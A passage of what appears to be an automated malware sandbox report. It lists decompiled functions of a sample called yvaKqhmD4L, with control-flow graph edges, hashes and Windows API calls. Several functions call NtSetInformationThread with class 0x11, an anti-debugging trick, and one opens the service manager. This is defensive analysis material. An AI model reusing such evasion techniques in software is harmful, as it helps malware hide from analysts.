                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CreateSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3332741929-0
                                              • Opcode ID: 012e0a8bbbf19a826a0cc13209229ad4df181b3d8ae351e5323f499571ee8eb0
                                              • Instruction ID: 0918fbfc80000e28d0efc035e0ef2f4cdf33fa8fdb4a08f37a66cce947dc1808
                                              • Opcode Fuzzy Hash: 012e0a8bbbf19a826a0cc13209229ad4df181b3d8ae351e5323f499571ee8eb0
                                              • Instruction Fuzzy Hash: DD317E702193059FEB01DF1AC88474ABBE4BF9A718F54492EE4E8D63A0D735D846CB53
                                              Function 6C073886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4877 6c073886-6c07388e 4878 6c073894-6c073896 4877->4878 4879 6c073970-6c07397d 4877->4879 4878->4879 4882 6c07389c-6c0738b9 4878->4882 4880 6c0739f1-6c0739f8 4879->4880 4881 6c07397f-6c073989 4879->4881 4884 6c073ab5-6c073aba 4880->4884 4885 6c0739fe-6c073a03 4880->4885 4881->4882 4883 6c07398f-6c073994 4881->4883 4886 6c0738c0-6c0738c1 4882->4886 4887 6c073b16-6c073b18 4883->4887 4888 6c07399a-6c07399f 4883->4888 4884->4882 4892 6c073ac0-6c073ac7 4884->4892 4889 6c0738d2-6c0738d4 4885->4889 4890 6c073a09-6c073a2f 4885->4890 4891 6c07395e 4886->4891 4887->4886 4893 6c0739a5-6c0739bf 4888->4893 4894 6c07383b-6c073855 call 6c1c2a20 call 6c1c2a30 4888->4894 4897 6c073957-6c07395c 4889->4897 4895 6c073a35-6c073a3a 4890->4895 4896 6c0738f8-6c073955 4890->4896 4898 6c073960-6c073964 4891->4898 4892->4886 4899 6c073acd-6c073ad6 4892->4899 4900 6c073a5a-6c073a5d 4893->4900 4904 6c073860-6c073885 4894->4904 4901 6c073a40-6c073a57 4895->4901 4902 6c073b1d-6c073b22 4895->4902 4896->4897 4897->4891 4898->4904 4905 6c07396a 4898->4905 4899->4887 4906 6c073ad8-6c073aeb 4899->4906 4911 6c073aa9-6c073ab0 4900->4911 4901->4900 4909 6c073b24-6c073b44 4902->4909 4910 6c073b49-6c073b50 4902->4910 4904->4877 4913 6c073ba1-6c073bb6 4905->4913 4906->4896 4907 6c073af1-6c073af8 4906->4907 4914 6c073b62-6c073b85 4907->4914 4915 6c073afa-6c073aff 4907->4915 4909->4911 4910->4886 4918 6c073b56-6c073b5d 4910->4918 4911->4898 4919 6c073bc0-6c073bda call 6c1c2a20 call 6c1c2a30 4913->4919 4914->4896 4923 6c073b8b 4914->4923 4915->4897 4918->4898 4928 6c073be0-6c073bfe 4919->4928 4923->4913 4931 6c073c04-6c073c11 4928->4931 4932 6c073e7b 4928->4932 4933 6c073c17-6c073c20 4931->4933 4934 6c073ce0-6c073cea 4931->4934 4935 6c073e81-6c073ee0 call 6c073750 GetCurrentThread NtSetInformationThread 4932->4935 4937 6c073c26-6c073c2d 4933->4937 4938 6c073dc5 4933->4938 4939 6c073cec-6c073d0c 4934->4939 4940 6c073d3a-6c073d3c 4934->4940 4950 6c073eea-6c073f04 call 6c1c2a20 call 6c1c2a30 4935->4950 4942 6c073dc3 4937->4942 4943 6c073c33-6c073c3a 4937->4943 4944 6c073dc6 4938->4944 4945 6c073d90-6c073d95 4939->4945 4946 6c073d70-6c073d8d 4940->4946 4947 6c073d3e-6c073d45 4940->4947 4942->4938 4951 6c073e26-6c073e2b 4943->4951 4952 6c073c40-6c073c5b 4943->4952 4953 6c073dc8-6c073dcc 4944->4953 4948 6c073d97-6c073db8 4945->4948 4949 6c073dba-6c073dc1 4945->4949 4946->4945 4954 6c073d50-6c073d57 4947->4954 4948->4938 4949->4942 4955 6c073dd7-6c073ddc 4949->4955 4971 6c073f75-6c073fa1 4950->4971 4957 6c073e31 4951->4957 4958 6c073c7b-6c073cd0 4951->4958 4959 6c073e1b-6c073e24 4952->4959 4953->4928 4960 6c073dd2 4953->4960 4954->4944 4961 6c073e36-6c073e3d 4955->4961 4962 6c073dde-6c073e17 4955->4962 4957->4919 4958->4954 4959->4953 4964 6c073e76-6c073e79 4959->4964 4960->4964 4967 6c073e3f-6c073e5a 4961->4967 4968 6c073e5c-6c073e5f 4961->4968 4962->4959 4964->4935 4967->4959 4968->4958 4970 6c073e65-6c073e69 4968->4970 4970->4953 4970->4964 4975 6c073fa3-6c073fa8 4971->4975 4976 6c074020-6c074026 4971->4976 4979 6c073fae-6c073fcf 4975->4979 4980 6c07407c-6c074081 4975->4980 4977 6c073f06-6c073f35 4976->4977 4978 6c07402c-6c07403c 4976->4978 4985 6c073f38-6c073f61 4977->4985 4981 6c0740b3-6c0740b8 4978->4981 4982 6c07403e-6c074058 4978->4982 4984 6c0740aa-6c0740ae 4979->4984 4983 6c074083-6c07408a 4980->4983 4980->4984 4981->4979 4989 6c0740be-6c0740c9 4981->4989 4987 6c07405a-6c074063 4982->4987 4983->4985 4988 6c074090 4983->4988 4990 6c073f6b-6c073f6f 4984->4990 4986 6c073f64-6c073f67 4985->4986 4991 6c073f69 4986->4991 4992 6c0740f5-6c07413f 4987->4992 4993 6c074069-6c07406c 4987->4993 4988->4950 4994 6c0740a7 4988->4994 4989->4984 4995 6c0740cb-6c0740d4 4989->4995 4990->4971 4991->4990 4992->4991 4996 6c074144-6c07414b 4993->4996 4997 6c074072-6c074077 4993->4997 4994->4984 4995->4994 4998 6c0740d6-6c0740f0 4995->4998 4996->4990 4997->4986 4998->4987
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d225c6772c62e9ea8e5c5c53d630627811867b254720423d804477260800aa69
                                              • Instruction ID: b2f31b8e5f16e9eb72f993f2adc2ea52e3af98af408013161bed8f90c58ad4f3
                                              • Opcode Fuzzy Hash: d225c6772c62e9ea8e5c5c53d630627811867b254720423d804477260800aa69
                                              • Instruction Fuzzy Hash: C632E532245B018FD338CF28C890795B7E3EFD93147698A6CC0EA4BA95D775B44ACB64
                                              Function 6C073A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CurrentThread
                                              • String ID:
                                              • API String ID: 2882836952-0
                                              • Opcode ID: f05c6386200e496bccc56ea9e0c716812b195b27dd7a2e9161af440685f42145
                                              • Instruction ID: d6742960f0c97649ade1e3caf74efc914e685c32fe4a25650963519a513a6a89
                                              • Opcode Fuzzy Hash: f05c6386200e496bccc56ea9e0c716812b195b27dd7a2e9161af440685f42145
                                              • Instruction Fuzzy Hash: 8E51D031244B018FD338CF28C884785B7E3BF99314F698A5DC0E61BA95DB75B44ACB65
                                              Function 6C0739CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CurrentThread
                                              • String ID:
                                              • API String ID: 2882836952-0
                                              • Opcode ID: 0530cefbd15124de6f3ed36b95eb547ccffc3b56242429cf441d2c4c0568c67a
                                              • Instruction ID: bc5303720fb885cde6685a811d3b12c2e150a60d52b5e84cbe946323fd750b58
                                              • Opcode Fuzzy Hash: 0530cefbd15124de6f3ed36b95eb547ccffc3b56242429cf441d2c4c0568c67a
                                              • Instruction Fuzzy Hash: 7451D131104B018FD338CF28C484799B7E3BF99314F658A1DC0E65BA95DB71B446CBA5
                                              Function 6C073D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 6C073E9D
                                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C073EAA
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Thread$CurrentInformation
                                              • String ID:
                                              • API String ID: 1650627709-0
                                              • Opcode ID: 2ac0a8e10ec7ff61ef26907679aea4c1fa16942a1de331df86ee111f4830aaf7
                                              • Instruction ID: fcf3abb0342a1e054c222738179be68f9ea1940a83ae26f1730c68ca6d43992f
                                              • Opcode Fuzzy Hash: 2ac0a8e10ec7ff61ef26907679aea4c1fa16942a1de331df86ee111f4830aaf7
                                              • Instruction Fuzzy Hash: 38310131245B01CFD738CF64C8887CAB7E3AF9A314F598A1CC0A65BA80DB747409CB66
                                              Function 6C073D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 6C073E9D
                                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C073EAA
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Thread$CurrentInformation
                                              • String ID:
                                              • API String ID: 1650627709-0
                                              • Opcode ID: b8b52ce76aeb878c027e0b8b5367e4e7fce267b77ada50fdbf6a3530e046eb46
                                              • Instruction ID: f1245baa27f99b6a636a2fc72b636f91b2493b2ec4613c9f7cb001d50a450299
                                              • Opcode Fuzzy Hash: b8b52ce76aeb878c027e0b8b5367e4e7fce267b77ada50fdbf6a3530e046eb46
                                              • Instruction Fuzzy Hash: 5F31EF31114B01CFE738CF68C49479AB7E2AF9A304F654A1CC0AA5BA81DB71B445CBA6
                                              Function 6C1F8810 Relevance: 3.1, APIs: 2, Instructions: 72serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C1F8820
                                              • OpenServiceA.ADVAPI32(?,?,00000004), ref: 6C1F88C5
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Open$ManagerService
                                              • String ID:
                                              • API String ID: 2351955762-0
                                              • Opcode ID: b0a74ee042c9700f83482c7ee981acb88dc474661e0ead964cee9554449cf402
                                              • Instruction ID: 309c3b1610765b9a5290c442b5481df239e1cd6e0df758d4f9157b0909f268a5
                                              • Opcode Fuzzy Hash: b0a74ee042c9700f83482c7ee981acb88dc474661e0ead964cee9554449cf402
                                              • Instruction Fuzzy Hash: 12311A74508305AFD7009F29C849A0EBBF0AB9A754F54885EF4A4D7261D271C859CB63
                                              Function 6C073C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 6C073E9D
                                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C073EAA
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Thread$CurrentInformation
                                              • String ID:
                                              • API String ID: 1650627709-0
                                              • Opcode ID: 0aa88e13ad34df7511b90fa87f625ec6e9e839bce5c49525dfaeef18f06696c6
                                              • Instruction ID: a5ec34db43fb7541f95c7cc18cfd19c6e4a7940803939ab854d16134bad01f0a
                                              • Opcode Fuzzy Hash: 0aa88e13ad34df7511b90fa87f625ec6e9e839bce5c49525dfaeef18f06696c6
                                              • Instruction Fuzzy Hash: 5721F470258701DFE738CF64C89479AB7F2AF5A304F554A1DD0A64BAD0DB74B404CB66
                                              Function 6C1EE090 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileA.KERNEL32(?,?), ref: 6C1EE0AC
                                              • FindClose.KERNEL32(000000FF), ref: 6C1EE0E2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 6cea0ab05c07911ab3b3b4d83eada43963ce0caf7e871cbeececbca5d5b6c77e
                                              • Instruction ID: 2de5b75587bf54edcc92abad9d637308fa10317c006cac43ae0060307ee6c1f2
                                              • Opcode Fuzzy Hash: 6cea0ab05c07911ab3b3b4d83eada43963ce0caf7e871cbeececbca5d5b6c77e
                                              • Instruction Fuzzy Hash: 08113A7460CB51DFC7108F28D944A4ABBF4AF8A324F148D4AF4A8C7790D734DA88CB92
                                              Function 6C2101C3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3722 6c2101c3-6c2101d3 3723 6c2101d5-6c2101e8 call 6c2030cf call 6c2030bc 3722->3723 3724 6c2101ed-6c2101ef 3722->3724 3742 6c21056c 3723->3742 3726 6c2101f5-6c2101fb 3724->3726 3727 6c210554-6c210561 call 6c2030cf call 6c2030bc 3724->3727 3726->3727 3728 6c210201-6c210227 3726->3728 3743 6c210567 call 6c203810 3727->3743 3728->3727 3731 6c21022d-6c210236 3728->3731 3734 6c210250-6c210252 3731->3734 3735 6c210238-6c21024b call 6c2030cf call 6c2030bc 3731->3735 3740 6c210550-6c210552 3734->3740 3741 6c210258-6c21025b 3734->3741 3735->3743 3745 6c21056f-6c210572 3740->3745 3741->3740 3746 6c210261-6c210265 3741->3746 3742->3745 3743->3742 3746->3735 3749 6c210267-6c21027e 3746->3749 3751 6c210280-6c210283 3749->3751 3752 6c2102cf-6c2102d5 3749->3752 3755 6c210293-6c210299 3751->3755 3756 6c210285-6c21028e 3751->3756 3753 6c2102d7-6c2102e1 3752->3753 3754 6c21029b-6c2102b2 call 6c2030cf call 6c2030bc call 6c203810 3752->3754 3757 6c2102e3-6c2102e5 3753->3757 3758 6c2102e8-6c210306 call 6c207ee5 call 6c207eab * 2 3753->3758 3786 6c210487 3754->3786 3755->3754 3760 6c2102b7-6c2102ca 3755->3760 3759 6c210353-6c210363 3756->3759 3757->3758 3790 6c210323-6c21034c call 6c20e359 3758->3790 3791 6c210308-6c21031e call 6c2030bc call 6c2030cf 3758->3791 3763 6c210369-6c210375 3759->3763 3764 6c210428-6c210431 call 6c2150d5 3759->3764 3760->3759 3763->3764 3768 6c21037b-6c21037d 3763->3768 3775 6c210433-6c210445 3764->3775 3776 6c2104a4 3764->3776 3768->3764 3772 6c210383-6c2103a7 3768->3772 3772->3764 3777 6c2103a9-6c2103bf 3772->3777 3775->3776 3781 6c210447-6c210456 GetConsoleMode 3775->3781 3779 6c2104a8-6c2104c0 ReadFile 3776->3779 3777->3764 3782 6c2103c1-6c2103c3 3777->3782 3784 6c2104c2-6c2104c8 3779->3784 3785 6c21051c-6c210527 GetLastError 3779->3785 3781->3776 3787 6c210458-6c21045c 3781->3787 3782->3764 3788 6c2103c5-6c2103eb 3782->3788 3784->3785 3794 6c2104ca 3784->3794 3792 6c210540-6c210543 3785->3792 3793 6c210529-6c21053b call 6c2030bc call 6c2030cf 3785->3793 3796 6c21048a-6c210494 call 6c207eab 3786->3796 3787->3779 3795 6c21045e-6c210478 ReadConsoleW 3787->3795 3788->3764 3797 6c2103ed-6c210403 3788->3797 3790->3759 3791->3786 3805 6c210480-6c210486 call 6c2030e2 3792->3805 3806 6c210549-6c21054b 3792->3806 3793->3786 3802 6c2104cd-6c2104df 3794->3802 3803 6c210499-6c2104a2 3795->3803 3804 6c21047a GetLastError 3795->3804 3796->3745 3797->3764 3798 6c210405-6c210407 3797->3798 3798->3764 3809 6c210409-6c210423 3798->3809 3802->3796 3813 6c2104e1-6c2104e5 3802->3813 3803->3802 3804->3805 3805->3786 3806->3796 3809->3764 3817 6c2104e7-6c2104f7 call 6c2105ee 3813->3817 3818 6c2104fe-6c210509 3813->3818 3829 6c2104fa-6c2104fc 3817->3829 3823 6c210515-6c21051a call 6c2108a6 3818->3823 3824 6c21050b call 6c210573 3818->3824 3830 6c210510-6c210513 3823->3830 3824->3830 3829->3796 3830->3829
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8Q
                                              • API String ID: 0-4022487301
                                              • Opcode ID: f8182716db9b3b6fd685ff31f568313041ba3b4376745a2cd5fdc99a1e180343
                                              • Instruction ID: 191fced18d0bc5e75d0f90ea3e2b4bd4a4aeab6bbd58ab3c7eb0e340b04ef22e
                                              • Opcode Fuzzy Hash: f8182716db9b3b6fd685ff31f568313041ba3b4376745a2cd5fdc99a1e180343
                                              • Instruction Fuzzy Hash: 76C1F570A0928EAFDF01CF99C880BADBBF1BF4A315F10415AEE14A7B81C7719955CB61
                                              Function 6C21775C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3831 6c21775c-6c21778c call 6c217bdc 3834 6c2177a7-6c2177b3 call 6c214cfc 3831->3834 3835 6c21778e-6c217799 call 6c2030cf 3831->3835 3841 6c2177b5-6c2177ca call 6c2030cf call 6c2030bc 3834->3841 3842 6c2177cc-6c217815 call 6c217b47 3834->3842 3840 6c21779b-6c2177a2 call 6c2030bc 3835->3840 3851 6c217a81-6c217a85 3840->3851 3841->3840 3849 6c217882-6c21788b GetFileType 3842->3849 3850 6c217817-6c217820 3842->3850 3855 6c2178d4-6c2178d7 3849->3855 3856 6c21788d-6c2178be GetLastError call 6c2030e2 CloseHandle 3849->3856 3853 6c217822-6c217826 3850->3853 3854 6c217857-6c21787d GetLastError call 6c2030e2 3850->3854 3853->3854 3860 6c217828-6c217855 call 6c217b47 3853->3860 3854->3840 3858 6c2178e0-6c2178e6 3855->3858 3859 6c2178d9-6c2178de 3855->3859 3856->3840 3870 6c2178c4-6c2178cf call 6c2030bc 3856->3870 3863 6c2178ea-6c217938 call 6c214ea0 3858->3863 3864 6c2178e8 3858->3864 3859->3863 3860->3849 3860->3854 3874 6c217957-6c21797f call 6c217e00 3863->3874 3875 6c21793a-6c217946 call 6c217d56 3863->3875 3864->3863 3870->3840 3880 6c217981-6c217982 3874->3880 3881 6c217984-6c2179c5 3874->3881 3875->3874 3882 6c217948 3875->3882 3883 6c21794a-6c217952 call 6c20f015 3880->3883 3884 6c2179c7-6c2179cb 3881->3884 3885 6c2179e6-6c2179f4 3881->3885 3882->3883 3883->3851 3884->3885 3886 6c2179cd-6c2179e1 3884->3886 3887 6c2179fa-6c2179fe 3885->3887 3888 6c217a7f 3885->3888 3886->3885 3887->3888 3890 6c217a00-6c217a33 CloseHandle call 6c217b47 3887->3890 3888->3851 3894 6c217a35-6c217a61 GetLastError call 6c2030e2 call 6c214e0f 3890->3894 3895 6c217a67-6c217a7b 3890->3895 3894->3895 3895->3888
                                              APIs
                                                • Part of subcall function 6C217B47: CreateFileW.KERNEL32(00000000,00000000,?,6C217805,?,?,00000000,?,6C217805,00000000,0000000C), ref: 6C217B64
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C217870
                                              • __dosmaperr.LIBCMT ref: 6C217877
                                              • GetFileType.KERNEL32(00000000), ref: 6C217883
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C21788D
                                              • __dosmaperr.LIBCMT ref: 6C217896
                                              • CloseHandle.KERNEL32(00000000), ref: 6C2178B6
                                              • CloseHandle.KERNEL32(6C20E7C0), ref: 6C217A03
                                              • GetLastError.KERNEL32 ref: 6C217A35
                                              • __dosmaperr.LIBCMT ref: 6C217A3C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: 8Q
                                              • API String ID: 4237864984-4022487301
                                              • Opcode ID: a43f02aa5b1e73ba79cdeb9bcd896c89c36137f04f6643b3952a25b88a793122
                                              • Instruction ID: ca558282e4a9ec8e3eb9a7bf203776dcf3da3ad3c8c57216a2c0e9ea77321372
                                              • Opcode Fuzzy Hash: a43f02aa5b1e73ba79cdeb9bcd896c89c36137f04f6643b3952a25b88a793122
                                              • Instruction Fuzzy Hash: 0AA10432A1814D8FCF099F68C855BAD7BF1AB87728F18015AED11ABBD0DB35890AC751
                                              Function 6C1CB4D0 Relevance: 16.6, APIs: 3, Strings: 6, Instructions: 834fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 6C1CB62F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
